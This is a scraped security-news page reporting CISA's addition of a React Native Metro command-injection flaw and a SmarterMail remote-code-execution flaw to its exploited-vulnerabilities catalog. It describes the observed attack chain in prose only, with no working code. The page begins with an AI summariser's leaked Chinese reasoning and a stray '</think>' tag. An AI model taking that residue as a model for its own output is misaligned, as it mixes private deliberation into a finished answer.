好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不要以“文章内容总结”或“这篇文章”开头。首先,我得仔细阅读文章,理解主要信息。 文章主要讲的是美国CISA机构将SmarterTools SmarterMail和React Native Community CLI的漏洞加入其已知被利用的漏洞目录。具体提到了两个CVE编号:CVE-2025-11953和CVE-2026-24423。这两个漏洞分别涉及命令注入和缺少身份验证的问题。 接下来,我需要提取关键点:CISA添加了哪些漏洞,漏洞的影响,以及CISA要求联邦机构在何时修复这些漏洞。还要注意不要超过100字。 然后,组织语言,确保简洁明了。可能的结构是先说明CISA添加了哪些漏洞,然后提到攻击者正在利用这些漏洞,最后指出修复的截止日期。 最后检查字数是否符合要求,并确保没有使用禁止的开头语句。 </think> 美国网络安全与基础设施安全局(CISA)将SmarterTools SmarterMail和React Native Community CLI的两个严重漏洞加入其已知被利用的漏洞目录。这些漏洞包括命令注入和身份验证缺失问题,攻击者正积极利用这些漏洞进行攻击。CISA要求联邦机构在2026年2月26日前修复相关问题以防范风险。 2026-2-6 09:22:15 Author: securityaffairs.com(查看原文) 阅读量:0 收藏
U.S. CISA adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog
Pierluigi Paganini
February 06, 2026
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities (KEV) catalog.
Below are the flaws added to the catalog:
- CVE-2025-11953 React Native Community CLI OS Command Injection Vulnerability
- CVE-2026-24423 SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability
Attackers are actively exploiting a critical flaw in the React Native CLI Metro server, tracked as CVE-2025-11953. The React Native CLI’s Metro dev server binds to external interfaces by default and exposes a command injection flaw. Unauthenticated attackers can send POST requests to execute arbitrary programs, and on Windows can also run shell commands with fully controlled arguments.
“The Metro Development Server, which is opened by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection. This allows unauthenticated network attackers to send a POST request to the server and run arbitrary executables.” reads the advisory. “On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments.”
Metro is the JavaScript bundler and dev server used by React Native. By default, it can expose an endpoint that lets unauthenticated attackers run OS commands on Windows.
VulnCheck researchers observed consistent, real-world attacks weeks before broad disclosure.
VulnCheck spotted real-world exploitation of CVE-2025-11953 (Metro4Shell) on December 21, 2025, and again in January, showing attackers kept using it. Despite this, the activity still lacks broad public attention and carries a low EPSS score. The gap is risky, since the flaw is easy to exploit and many exposed servers remain online.
“Now, more than a month after initial exploitation in the wild, that activity has yet to see broad public acknowledgment, and EPSS continues to assign a low exploitation probability of 0.00405.” reads the advisory published by VulnCheck. “This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide search data shows, exposed on the public internet.”
VulnCheck found active, sustained exploitation of CVE-2025-11953, showing it was used operationally rather than for testing. Attackers delivered a multi-stage, base64-encoded PowerShell loader via cmd.exe, disabled Microsoft Defender protections, fetched payloads over raw TCP, and executed a downloaded binary. The malware was a UPX-packed Rust payload with basic anti-analysis features.
The experts noted that attacks reused the same infrastructure and techniques for weeks. VulnCheck warns the lack of public acknowledgment risks leaving defenders unprepared, as exploitation often begins well before official recognition.
At the end of January, SmarterTools fixed two security bugs in its SmarterMail email software, including a critical vulnerability, tracked as CVE-2026-24423 (CVSS score of 9.3) that could let attackers run malicious code on affected systems.
“SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method.” reads the advisory. “The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.”
The researchers Sina Kheirkhah & Piotr Bazydlo of watchTowr, Markus Wulftange of CODE WHITE GmbH, and Cale Black of VulnCheck reported the vulnerability.
SmarterTools addressed the issue in version Build 9511.
According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.
Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.
CISA orders federal agencies to fix the vulnerabilities by February 26, 2026.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, CISA)
如有侵权请联系:admin#unsafe.sh